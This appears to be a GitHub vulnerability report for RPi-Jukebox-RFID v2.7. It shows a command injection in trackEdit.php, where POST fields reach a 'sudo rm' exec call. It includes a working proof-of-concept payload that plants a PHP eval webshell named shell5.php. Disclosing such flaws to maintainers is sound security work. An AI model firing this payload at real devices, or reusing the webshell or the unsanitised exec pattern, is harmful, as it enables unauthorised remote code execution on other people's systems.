Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\trackEdit.php

if($_POST['ACTION'] == "trackDelete") {     // Line 232 (CheckPoint)
    if($_POST['deleteTrack'] == "yes") {    // Line 233 (CheckPoint)
        $exec = 'sudo rm "'.$post['folder'].'/'.$post['filename'].'"'; // Line 235 (Source)
        exec($exec);    // Line 236 (Sink)

Source from Line 235 ($_POST['folder'] and $_POST['filename'] ) .

And then there are two check point(Line 232 and Line 233) ,which we should set $_POST['ACTION'] = trackDelete and $_POST['deleteTrack'] = yes to bypass.

After bypass two check point, the source(tainted) pass to $exec and exec($exec);(Line 236) without another check.

Poc

POST /htdocs/trackEdit.php

Data:

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the version without url encoding for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"

Manual verification

The attacker can then easily connect to this webshell(/htdocs/shell5.php)

Logs

No response

Configuration

No response

More info

No response

MiczFlor / RPi-Jukebox-RFID

🐛 | RPi-Jukebox-RFID V2.7_RCE_5 #2400

Version

Branch

OS

Pi model

Hardware

What happened?

Analysis

Poc

Manual verification

Logs

Configuration

More info

Poc_fixed